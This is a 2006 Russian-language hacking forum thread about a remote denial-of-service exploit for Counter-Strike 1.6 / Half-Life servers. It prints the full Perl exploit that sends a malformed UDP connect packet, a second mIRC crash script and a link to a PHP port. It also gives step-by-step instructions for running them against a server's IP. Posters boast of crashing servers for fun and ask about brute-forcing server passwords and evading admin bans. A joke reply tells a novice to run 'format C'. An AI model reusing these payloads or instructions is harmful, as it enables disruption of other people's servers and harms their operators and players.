Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Защита ОС: вирусы, антивирусы, файрволы. (https://forum.antichat.xyz/forumdisplay.php?f=80)
-   -   CS-sploit (https://forum.antichat.xyz/showthread.php?t=20266)

kipfun 07.06.2006 18:54

CS-sploit
 
нашел рульный сплот убивающий серваки CS:

#!/usr/bin/perl
# Half-Life engine remote DoS exploit
# bug found by Firestorm
# tested against cstrike 1.6 Windows build-in server, cstrike 1.6 linux
# dedicated server
use IO::Socket;
die "usage: ./csdos <host>" unless $ARGV[0];
$host=$ARGV[0];

if (fork())
{ econnect($host); }
else
{ econnect($host); };
exit;

sub econnect($)
{
my $host=$_[0];
my $sock = new
IO::Socket::INET(PeerAddr=>$host,PeerPort=>'27015' ,Proto=>'udp');
die "Could not create socket: $!\n" unless $sock;
$cmd="\xff\xff\xff\xff";
syswrite $sock, $cmd."getchallenge";

sysread $sock,$b,65535; print $b,"\n";
@c=split(/ /,$b);

$c2=$c[1];

$q=$cmd."connect 47 $c2 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a3 6258af1bb64ed866538c9db76\"\"\\\"\0\0";
print '>',$q,"\n";
syswrite $sock, $q;
sysread $sock,$b,65535; print $b,"\n";
sleep 3;
close $sock;
}

все пашет....но запероленный сервак..не берет..вылетает : $BADPASSWORD
$BADPASSWORD

у кого какие соображения будут ?

max_pain89 07.06.2006 19:31

у меня никаких, ну впринципе если ты напишешь брут к серву, потом пробрутишь валидный пароль, потом составишь эксплойт, так чтоб он передавал пароль, то может и зачёт сдаш

Talisman 07.06.2006 21:49

у меня появились - защищу свой сервер :)

Dracula4ever 08.06.2006 14:27

Не плохой сплойт.
Спасибо!

kipfun 13.06.2006 11:37

Сам тащусь..... :) но все таки ! как можно реализовать...подвес запорленных серваков? и еще допустим я добыл пароль , куда его можно прописать.

De_X 13.06.2006 14:26

:rolleyes: подскажите пожалуйста куда сам сплойт пихать чтоб отрубить сервак?

Haz3r 13.06.2006 15:06

Вощем смари сюда ! Нажимаеш Пуск-Выполнить- Shutdown -t 00 вроде так если не поможет то вот так format C там вощем окошко появится в которое эту шнягу вбить надо и нажать CTRL+ENTER ! Спрашиваеш почему все так сложно ? а потому что мы же хакеры и способы у нас должны быть хакерские ;) так что давай жги сервы !

max_pain89 13.06.2006 17:36

ОТВЕТ - НИКАК! Зависание происходит уже после приконекчивания.

TreniX 13.06.2006 19:42

remote DoS exploit
 
Сплойт рулит!! :D
а где ты его добыл?? :confused:

De_X 13.06.2006 20:07

Цитата:

Сообщение от max_pain89
ОТВЕТ - НИКАК! Зависание происходит уже после приконекчивания.

а как этот сплойт включать? я на сервак зайдуи как сплоит активировать?

kipfun 14.06.2006 10:52

пользоваться им очень просто....качаешь Active Perl ( около 12 метров на гугле найдешь :) ) жмешь выполнить и набираешь : c:\Perl/bin/perl.exe c:\exploit\cs16.pl xxx.xxx.xxx.xxx где x IP адрес триклятого сервера CS

Haz3r 14.06.2006 14:10

Там был вопрос где ты его достал? я не он но скажу что где угодно =) я этот сплойт увидел еще месяцев 6 назад и вообще и считаю что такие вещи должны быть приватными , ибо всякие ....... кхм нехорошие люди вешают сервы дайте вы поиграть то нормально и скажите зачем вам это надо ? ( я не в счёт =)) я рубил рублю и буду рубить сервы а почему ? потому-что прикольно :) )

ProTeuS 14.06.2006 14:28

Haz3r, уже неважно 4то сабж давно паблик, т.к. на 28 пат4е по слухам (т.к. сам не дока4ал =) уже уязвимости нет

ProTeuS 14.06.2006 14:30

и нас4ет брута: еще для 45-46 протоколов были готовые реализации...

De_X 14.06.2006 20:21

кстати кто знает где достать AntiBAn для CS 1.6 ну чтоб админы не баннили и не выкидывали с сервера? я чувака на серваке видел он специально просил админов его забанить а те парились и не чё не смогли сделать так от так стебался на серваке...

lolka 15.06.2006 00:14

2kipfun: пишу как ты и сказал "c:\Perl/bin/perl.exe c:\exploit\cs16.pl xxx.xxx.xxx.xxx" пишит мне
****

A00000000 1617623932 2

>****connect 47 1617623932 "\prot\4\unique\0\raw\valve\cdkey\f0ef8a362 58af1bb64
ed866538c9db76""\"
****9Invalid hashed CD key.

Можети обьснить мне что это такое?;)

kipfun 15.06.2006 10:39

неверный CD ключ, введи в строку (cdkey\\f0ef8a362 58af1bb64ed866538c9db76) действительный ключ...

lolka 15.06.2006 13:25

2kipfun: а ты пробывал? ;) сам пользватся этим експлойтом? ;)

kipfun 15.06.2006 15:37

обижашь :) в своей локалке житья никому не даю...... рубит все серваки на повал! и хл и кс 1.6, тока под паролем не берет..... а так все на ура..! у тебя может не идти потому что может патч послдений поставили, в них этот баг исправили.....не заню в нет это актуально будет еще не много....а в локалках еще долго...

stalker.md 26.06.2006 11:02

Я открываю перл делаю как ва написали,мне пишет:
<Do you need to predeclare pl?>
А этот сплоит куда пихать надо?
как можно бан в кс снять?
Подскажите чтото* :(

forever777 26.06.2006 12:42

интернет сервера кс рубить мона?

forever777 26.06.2006 12:48

Цитата:

Сообщение от kipfun
пользоваться им очень просто....качаешь Active Perl ( около 12 метров на гугле найдешь :) ) жмешь выполнить и набираешь : c:\Perl/bin/perl.exe c:\exploit\cs16.pl xxx.xxx.xxx.xxx где x IP адрес триклятого сервера CS

уверен что c:\Perl/bin/perl.exe может c:\Perl\bin\perl.exe

kipfun 27.06.2006 22:36

ой слэшики перепутал простите! :)

ProTeuS 28.06.2006 00:48

Цитата:

Сообщение от De_X
кстати кто знает где достать AntiBAn для CS 1.6 ну чтоб админы не баннили и не выкидывали с сервера? я чувака на серваке видел он специально просил админов его забанить а те парились и не чё не смогли сделать так от так стебался на серваке...

как я понимаю, ре4ь идет о плагине к метамоду (амх мод?), тогда имхо это не представляется возможнЫм, кроме как юзанья какой-нить специфи4еской баги плагина, либо воода необработываемого стим-идентификатора для невозможности корректного ввода команды amx_ban

ZINGER 28.06.2006 01:04

Цитата:

Сообщение от De_X
кстати кто знает где достать AntiBAn для CS 1.6 ну чтоб админы не баннили и не выкидывали с сервера? я чувака на серваке видел он специально просил админов его забанить а те парились и не чё не смогли сделать так от так стебался на серваке...

может просто парниша ставил символ `

ProTeuS 28.06.2006 01:20

в valveID? ;)
сомневаюсь 4то он таким макаром приконнектился куда-либо (в ник разве4то, но только для тех, кто не знает командs users; kick #id)

Lam 13.07.2006 09:30

А чо бан снять как в чате нельзя что ли? сменить Ip и все такое еще что бы не кикнули в ник можно вставить не видимый символ, слышал помогает хотя сам еще не пробовал.

ZINGER 13.07.2006 10:03

Цитата:

вставить не видимый символ
есть стоит amxmod (99% серверов) это не спасет

Fro$T 26.07.2006 16:54

\"A00000000 1617623932 2

>****connect 47 1617623932 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a3 62 58af1bb64
ed866538c9db76\"\"\\\"
****9Invalid hashed CD key.\"
тоже такая ошибка вылетает,хоя ключ вставлял нормальный

GluckX 17.08.2006 01:05

Существует ещё эксплойтик. Нужно просто указать ипшник :)

Реализация под win32: http://lex-studio.by.ru/soft/gs/soft_GameSearcher11.htm

Скрипт для мирк:
CSBoom {
var %ips $$?="Мочи ламаков"
var %buf $chr(254) $+ $chr(255) $+ $chr(255) $+ $chr(255) $+ $chr(0) $+ $chr(0) $+ $chr(0) $+ $chr(0)
/sockudp cs %ips 27015 %buf
echo %ips уничтожен
}

gemaglabin 17.08.2006 12:53

Вот портированный perl сплоит на php

http://underwater.cup.su/cs.php

tRu 17.08.2006 17:51

А не дос ли? Он работает от 3 лица?

Sn][per 15.02.2007 17:16

как сменить метод аутентификации 4
PHP код:

$q=$cmd."connect 47 $c2 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a362 58af1bb64ed866538c9db76\"\"\\\"\0\0"

на 2
что поменять надо?
тупо сменить 4 на 2 не катит


Время: 03:05